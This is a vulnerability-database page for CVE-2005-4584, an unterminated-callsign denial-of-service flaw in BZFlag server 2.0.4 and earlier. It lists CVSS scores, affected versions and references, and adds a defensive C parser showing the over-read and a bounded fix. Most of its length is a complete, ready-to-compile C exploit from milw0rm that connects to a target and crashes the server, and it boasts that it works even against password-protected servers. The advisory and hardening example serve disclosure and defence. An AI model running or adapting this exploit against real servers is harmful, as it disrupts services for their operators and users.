CVE-2005-4584
CVSS 5.0
Published: 2005-12-29 06:03:00
Revised: 2008-09-10 15:53:01
NMCOE

[Original] BZFlag server 2.0.4 and earlier allows remote attackers to cause a denial of service (application crash) via a callsign that is not followed by a NULL (\0) character.


[CNNVD] BZFlag Unterminated Callsign Denial of Service Vulnerability (CNNVD-200512-622)

        BZFlag server 2.0.4 and earlier allows remote attackers to launch a denial of service attack (application crash) via a callsign that is not followed by a null (\0) character.

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interruption of access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

cpe:/a:bzflag:bzflag_server:1.10.6
cpe:/a:bzflag:bzflag_server:1.7d5
cpe:/a:bzflag:bzflag_server:1.7d3
cpe:/a:bzflag:bzflag_server:1.7e4
cpe:/a:bzflag:bzflag_server:2.0.0
cpe:/a:bzflag:bzflag_server:1.7c_release_2
cpe:/a:bzflag:bzflag_server:1.10.2
cpe:/a:bzflag:bzflag_server:1.7d6
cpe:/a:bzflag:bzflag_server:1.7c_release_1
cpe:/a:bzflag:bzflag_server:1.7d8
cpe:/a:bzflag:bzflag_server:2.0.4
cpe:/a:bzflag:bzflag_server:1.7e
cpe:/a:bzflag:bzflag_server:1.7d9
cpe:/a:bzflag:bzflag_server:1.7d7
cpe:/a:bzflag:bzflag_server:1.7c_release_2_patch_1
cpe:/a:bzflag:bzflag_server:1.7g2
cpe:/a:bzflag:bzflag_server:1.10.8
cpe:/a:bzflag:bzflag_server:1.7d4
cpe:/a:bzflag:bzflag_server:1.7d2
cpe:/a:bzflag:bzflag_server:1.7e6
cpe:/a:bzflag:bzflag_server:2.0.2
cpe:/a:bzflag:bzflag_server:1.7d1
cpe:/a:bzflag:bzflag_server:1.10.0
cpe:/a:bzflag:bzflag_server:1.7e1
cpe:/a:bzflag:bzflag_server:1.7c_release_2_patch_3
cpe:/a:bzflag:bzflag_server:1.7g0
cpe:/a:bzflag:bzflag_server:1.10.4
cpe:/a:bzflag:bzflag_server:1.7e2
cpe:/a:bzflag:bzflag_server:1.7c_release_2_patch_2

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4584
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4584
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-622
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/16066
(UNKNOWN)  BID  16066
http://securitytracker.com/id?1015418
(UNKNOWN)  SECTRACK  1015418
http://secunia.com/advisories/18238
(VENDOR_ADVISORY)  SECUNIA  18238
http://cvs.sourceforge.net/viewcvs.py/%2Acheckout%2A/bzflag/bzflag/ChangeLog?rev=2.103
(UNKNOWN)  MISC  http://cvs.sourceforge.net/viewcvs.py/*checkout*/bzflag/bzflag/ChangeLog?rev=2.103
http://aluigi.altervista.org/adv/bzflagboom-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/bzflagboom-adv.txt
http://xforce.iss.net/xforce/xfdb/23872
(UNKNOWN)  XF  bzflag-callsign-dos(23872)
http://www.osvdb.org/22036
(UNKNOWN)  OSVDB  22036

- Vulnerability Information

BZFlag Unterminated Callsign Denial of Service Vulnerability
Medium risk / Other
2005-12-29 00:00:00 2006-01-10 00:00:00
Remote
        BZFlag server 2.0.4 and earlier allows remote attackers to launch a denial of service attack (application crash) via a callsign that is not followed by a null (\0) character.

- Advisories and Patches


- Vulnerability Information (1390)

BZFlag <= 2.0.4 (undelimited string) Denial of Service Exploit (EDBID:1390)
multiple dos
2005-12-27 Verified
0 Luigi Auriemma
N/A
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
/*
   Header file used for manage errors in Windows
   It support socket and errno too
   (this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>



void std_err(void) {
    char    *error;

    switch(WSAGetLastError()) {
        case 10004: error = "Interrupted system call"; break;
        case 10009: error = "Bad file number"; break;
        case 10013: error = "Permission denied"; break;
        case 10014: error = "Bad address"; break;
        case 10022: error = "Invalid argument (not bind)"; break;
        case 10024: error = "Too many open files"; break;
        case 10035: error = "Operation would block"; break;
        case 10036: error = "Operation now in progress"; break;
        case 10037: error = "Operation already in progress"; break;
        case 10038: error = "Socket operation on non-socket"; break;
        case 10039: error = "Destination address required"; break;
        case 10040: error = "Message too long"; break;
        case 10041: error = "Protocol wrong type for socket"; break;
        case 10042: error = "Bad protocol option"; break;
        case 10043: error = "Protocol not supported"; break;
        case 10044: error = "Socket type not supported"; break;
        case 10045: error = "Operation not supported on socket"; break;
        case 10046: error = "Protocol family not supported"; break;
        case 10047: error = "Address family not supported by protocol family"; break;
        case 10048: error = "Address already in use"; break;
        case 10049: error = "Can't assign requested address"; break;
        case 10050: error = "Network is down"; break;
        case 10051: error = "Network is unreachable"; break;
        case 10052: error = "Net dropped connection or reset"; break;
        case 10053: error = "Software caused connection abort"; break;
        case 10054: error = "Connection reset by peer"; break;
        case 10055: error = "No buffer space available"; break;
        case 10056: error = "Socket is already connected"; break;
        case 10057: error = "Socket is not connected"; break;
        case 10058: error = "Can't send after socket shutdown"; break;
        case 10059: error = "Too many references, can't splice"; break;
        case 10060: error = "Connection timed out"; break;
        case 10061: error = "Connection refused"; break;
        case 10062: error = "Too many levels of symbolic links"; break;
        case 10063: error = "File name too long"; break;
        case 10064: error = "Host is down"; break;
        case 10065: error = "No Route to Host"; break;
        case 10066: error = "Directory not empty"; break;
        case 10067: error = "Too many processes"; break;
        case 10068: error = "Too many users"; break;
        case 10069: error = "Disc Quota Exceeded"; break;
        case 10070: error = "Stale NFS file handle"; break;
        case 10091: error = "Network SubSystem is unavailable"; break;
        case 10092: error = "WINSOCK DLL Version out of range"; break;
        case 10093: error = "Successful WSASTARTUP not yet performed"; break;
        case 10071: error = "Too many levels of remote in path"; break;
        case 11001: error = "Host not found"; break;
        case 11002: error = "Non-Authoritative Host not found"; break;
        case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
        case 11004: error = "Valid name, no data record of requested type"; break;
        default: error = strerror(errno); break;
    }
    fprintf(stderr, "\nError: %s\n", error);
    exit(1);
}

// combined winerr.h /str0ke

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER         "0.1"
#define BUFFSZ      0xffff
#define PORT        5154
#define TIMEOUT     8

#define WAITSEC     5
#define CALLSIGNSZ  32
#define MAILSZ      128
#define TOKENSZ     22
#define VERSIONSZ   60
#define TYPE        "\x00\x00"
#define TEAM        "\xff\xfe"  // autoteam



int bzflag_send(int sd, u_char *buff, u_char *code, ...);
int tcp_recv(int sd, u_char *data, int len);
u_short bzflag_recv(int sd, u_char *buff, u_char *code);
int create_rand_string(u_char *data, int len, u_int *seed);
int timeout(int sock, int secs);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   seed;
    int     sd;
    u_short port = PORT,
            len;
    u_char  buff[BUFFSZ],
            callsign[CALLSIGNSZ + 1],
            mail[MAILSZ + 1],
            token[TOKENSZ + 1],
            version[VERSIONSZ + 1],
            code[2];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "BZFlag <= 2.0.4 (2.x) server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n"
            " This tool works also versus servers protected by password without knowing the\n"
            " keyword!\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    fputs("- check server version: ", stdout);
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd, TIMEOUT) < 0) {
        printf("\nError: no reply received within %d seconds, this server doesn't seem valid\n\n", TIMEOUT);
        exit(1);
    }
    tcp_recv(sd, buff, 9);

    printf("   %s\n", buff);
    if(memcmp(buff, "BZFS", 4)) {
        fputs("- this server doesn't seem a valid BZFlag server, I try to continue\n", stdout);
    } else {
        if(memcmp(buff + 4, "00", 2)) {
            fputs("- this server uses a version which is not vulnerable, I try to continue\n", stdout);
        }
    }

    if(!timeout(sd, 0)) {   // 2.0.4 sends data while the previous 2.0 not
        len = bzflag_recv(sd, buff, code);
    }

    create_rand_string(callsign, CALLSIGNSZ, &seed);    // <=== THE BUG IS HERE
    create_rand_string(mail,     MAILSZ,     &seed);
    create_rand_string(token,    TOKENSZ,    &seed);
    create_rand_string(version,  VERSIONSZ,  &seed);

    bzflag_send(sd,
        buff,
        "en",
        2,          TYPE,
        2,          TEAM,
        CALLSIGNSZ, callsign,
        MAILSZ,     mail,
        TOKENSZ,    token,
        VERSIONSZ,  version,
        0);

    len = bzflag_recv(sd, buff, code);

    if(memcmp(code, "ac", 2)) {
        buff[len] = 0;
        printf("\n"
            "Error: code \"%.2s\"\n"
            "%s\n"
            "\n",
            code, buff + 2);
    }

    close(sd);

    fputs("- check server:\n", stdout);
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(
      (connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) ||
      (timeout(sd, 3) < 0)) {
        fputs("\n  Server IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\n"
            "  Server doesn't seem vulnerable\n"
            "  RELAUNCH THIS TOOL OTHER TIMES UNTIL YOU ARE UNABLE TO CRASH IT!!!\n"
            "\n", stdout);
    }
    close(sd);
    return(0);
}



int bzflag_send(int sd, u_char *buff, u_char *code, ...) {
    va_list ap;
    int     len;
    u_short *blen;
    u_char  *s,
            *p;

    blen = (u_short *)buff;
    memcpy(buff + 2, code, 2);
    p = buff + 4;

    va_start(ap, code);
    while((len = va_arg(ap, int))) {
        s = va_arg(ap, u_char *);
        memcpy(p, s, len);
        p += len;
    }
    va_end(ap);

    *blen = htons(p - (buff + 4));

    len = send(sd, buff, p - buff, 0);
    return(len);
}



int tcp_recv(int sd, u_char *data, int len) {
    int     t;

    while(len) {
        t = recv(sd, data, len, 0);
        if(t <= 0) return(-1);
        data += t;
        len  -= t;
    }

    return(0);
}



u_short bzflag_recv(int sd, u_char *buff, u_char *code) {
    u_short len;

    tcp_recv(sd, (u_char *)&len, 2);
    len = ntohs(len);

    tcp_recv(sd, code, 2);

    tcp_recv(sd, buff, len);

    return(len);
}



int create_rand_string(u_char *data, int len, u_int *seed) {
    u_int   rnd;
    u_char  *p = data;
    const static u_char table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
//    len = rnd % len;  // max length!
//    if(len < 3) len = 3;

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 1000;    // in case secs is 0
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

// milw0rm.com [2005-12-27]

- Vulnerability Information

22036
BZFlag NULL Byte callsign Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability Description

BZFlag contains a flaw that may allow a remote denial of service. The issue is triggered when the BZFlag server process is sent a callsign message which is not NULL-terminated, and will result in loss of availability of the service.
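The defect described above is a fixed-width callsign field that the server treats as a C string without first checking that a terminator exists inside the field. The C program below is an added, illustrative example written for this page, not BZFlag's own server code: it reconstructs the "en" message layout from the published exploit's send call (type, team, callsign, mail, token, version; the field names, offsets and return codes are assumptions), shows the naive strlen() idiom over-reading into the next field on a constructed unterminated sample, and then the bounded parser that rejects such a message instead of crashing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Field sizes as used in the published exploit's "en" message. */
#define CALLSIGNSZ  32
#define MAILSZ      128
#define TOKENSZ     22
#define VERSIONSZ   60

/* Body layout after the 2-byte length and 2-byte code "en":
 * type(2) team(2) callsign(32) mail(128) token(22) version(60) = 246 bytes.
 * Offsets are reconstructed from the exploit's bzflag_send() call; the
 * field names are assumptions, and nothing here is BZFlag server code. */
#define EN_TYPE_OFF     0
#define EN_TEAM_OFF     2
#define EN_CALLSIGN_OFF 4
#define EN_MAIL_OFF     (EN_CALLSIGN_OFF + CALLSIGNSZ)
#define EN_TOKEN_OFF    (EN_MAIL_OFF + MAILSZ)
#define EN_VERSION_OFF  (EN_TOKEN_OFF + TOKENSZ)
#define EN_BODY_LEN     (EN_VERSION_OFF + VERSIONSZ)

struct enter_msg {
    uint16_t type;
    uint16_t team;
    char callsign[CALLSIGNSZ + 1];
    char mail[MAILSZ + 1];
    char token[TOKENSZ + 1];
    char version[VERSIONSZ + 1];
};

/* The vulnerable idiom (hypothetical, modelled on the CVE text): assume the
 * fixed-size field carries a terminated C string. With no NUL inside the
 * 32 bytes, strlen() keeps reading into the following fields and, on a real
 * packet, past the end of the receive buffer. */
size_t naive_callsign_len(const uint8_t *body) {
    return strlen((const char *)body + EN_CALLSIGN_OFF);
}

/* Hardened copy: accept the field only if a NUL lies within its declared
 * size; otherwise return -1 so the caller can reject the whole message. */
int copy_terminated_field(char *dst, const uint8_t *field, size_t fieldsz) {
    const uint8_t *nul = memchr(field, 0, fieldsz);
    if (nul == NULL)
        return -1;
    size_t n = (size_t)(nul - field);
    memcpy(dst, field, n);
    dst[n] = '\0';
    return (int)n;
}

/* Parse an "en" body. Returns 0 on success, -1 if the body is shorter than
 * the fixed layout, -2 if any string field is not NUL-terminated in place. */
int parse_enter(const uint8_t *body, size_t bodylen, struct enter_msg *out) {
    if (bodylen < EN_BODY_LEN)
        return -1;
    out->type = (uint16_t)((body[EN_TYPE_OFF] << 8) | body[EN_TYPE_OFF + 1]);
    out->team = (uint16_t)((body[EN_TEAM_OFF] << 8) | body[EN_TEAM_OFF + 1]);
    if (copy_terminated_field(out->callsign, body + EN_CALLSIGN_OFF, CALLSIGNSZ) < 0 ||
        copy_terminated_field(out->mail,     body + EN_MAIL_OFF,     MAILSZ)     < 0 ||
        copy_terminated_field(out->token,    body + EN_TOKEN_OFF,    TOKENSZ)    < 0 ||
        copy_terminated_field(out->version,  body + EN_VERSION_OFF,  VERSIONSZ)  < 0)
        return -2;
    return 0;
}

/* Constructed sample bodies (not captured traffic). The one extra trailing
 * byte is a NUL sentinel so that the deliberately unsafe naive_callsign_len()
 * demonstration stops inside our own buffer instead of reading off the end. */
static uint8_t sample[EN_BODY_LEN + 1];

const uint8_t *build_sample(int terminated) {
    memset(sample, 0, sizeof sample);
    sample[EN_TEAM_OFF] = 0xff;          /* 0xfffe = autoteam, as in the */
    sample[EN_TEAM_OFF + 1] = 0xfe;      /* exploit's TEAM constant       */
    if (terminated)
        memcpy(sample + EN_CALLSIGN_OFF, "tank1", 5);          /* NUL follows */
    else
        memset(sample + EN_CALLSIGN_OFF, 'A', CALLSIGNSZ);     /* no NUL at all */
    memcpy(sample + EN_MAIL_OFF, "bob@", 4);
    memcpy(sample + EN_TOKEN_OFF, "tok", 3);
    memcpy(sample + EN_VERSION_OFF, "ver", 3);
    return sample;
}

int main(void) {
    struct enter_msg m;
    const uint8_t *good = build_sample(1);
    printf("terminated:   parse=%d callsign=\"%s\" strlen=%zu\n",
           parse_enter(good, EN_BODY_LEN, &m), m.callsign, naive_callsign_len(good));
    const uint8_t *bad = build_sample(0);
    printf("unterminated: parse=%d (rejected) strlen=%zu (ran into mail field)\n",
           parse_enter(bad, EN_BODY_LEN, &m), naive_callsign_len(bad));
    return 0;
}
```

On the unterminated sample the naive length comes out as 36 rather than 32 because strlen() walked through the 32 'A' bytes and four bytes of the adjacent mail field before finding a NUL; in a server with no sentinel that read continues until it hits unmapped memory, which is the crash the advisory describes. The hardened parser never inspects bytes beyond the field's declared size and fails closed on a missing terminator.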

- Timeline

2005-12-25 Unknown
2005-12-25 Unknown

- Solution

Upgrade to the latest version available from CVS from end of October 2005 or later, as it has been reported to fix this vulnerability. Note that this flaw was fixed in the CVS tree without a change in version number. An upgrade is required as there are no known workarounds.

- Related References

- Vulnerability Author
